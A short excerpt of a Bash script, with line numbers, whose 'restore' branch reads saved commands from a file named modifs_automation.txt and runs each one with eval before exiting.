Restore modifications 1685 | if [[ $restore ]]; then 1686 | DIR=$ProjectName 1687 | while IFS= read -r command; do 1688 | eval $command 1689 | done < "${ROOT_PATH}/modifs_automation.txt" 1690 | exit 1691 | fi 1692 | --------------------------------------------------------------------------------